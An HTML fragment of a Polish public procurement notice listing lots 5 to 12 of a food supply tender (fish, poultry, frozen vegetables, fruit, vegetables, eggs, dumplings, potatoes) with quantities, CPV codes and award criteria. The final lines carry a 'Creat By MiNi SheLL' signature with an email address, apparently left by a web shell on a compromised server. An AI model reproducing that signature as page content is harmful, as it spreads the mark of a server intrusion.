<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin platności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ryby przetworzone i konserwowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z ryby morszczuk mrożony  SHP
	Kg 	300	
2	Filet śledziowy  b/skóry 
w zalewie  octowo-olejowej   
	kg	150	
3	Makrela wędzona 	Kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.23.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin platności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet  drobiowy 
 / świeży /
	kg	430
2	Porcje rosołowe
	Kg

	200
3	Udka z kurczaka  świeża  
	Kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin platności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mieszanka mrożona 
wielowarzywna 
7 składnikowa
 Op.2,5 kg
	Op.	35 
2	Kalafior mrożony  
Op.2.50 kg
	op.	30 
3	Szpinak mrożony -  liść
op.2.50 kg
	op.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin platności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jabłka  gat. I 	kg	2700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Burak ćwikła 	kg.	350
2	Cebula  biała	kg.	300
3	marchew	kg.	500
4	seler  ( korzeń ) 	kg.	30
5	por 	kg.	100
6	Pietruszka korzeń 	kg.	20
7	Kapusta czerwona	kg.	100
8	Kapusta biała 	kg.	500
9	Kapusta włoska 	kg.	100
10	Kapusta pekińska	kg.	260
11	Kapusta kiszona	kg.	150
12	Ogórek kwaszony 	kg.	150
13	Fasola biała 	kg.	120
14	Groch  łupany   	kg.	20
15	Czosnek 	kg.	22
16	Pieczarka 	kg.	80
17	Szczypior 	Peczk.	100
18	Papryka świeżą 	Kg 	30
19	pomidor	kg	350
20	Ogórek zielony	kg	350
21	Sałata 	szt	300
22	Szczypiorek 	p.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.22.11.10-0, 03.22.14.00-0, 03.22.12.40-0, 03.22.12.30-0, 03.22.12.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> jaja kurze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze świeże kl. A wielkość  M  Szt.	7000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin platności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Produkty garmażeryjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pierogi ruskie  domowe	Kg.	 40
2	Pierogi z kapustą  i pieczarkami	kg	40 
3	Krokiety z kapustą i pieczarkami 	kg	60
4  Kopytka świeże Kg  150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.42.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin platności - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Ziemniaki jadalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	
Ziemniaki jadalne późne  op. worek nie mniej jak  30 kg 
Polska Norma - 
PN-R-74450:1975
	
kg	 6500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin platności - 3</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com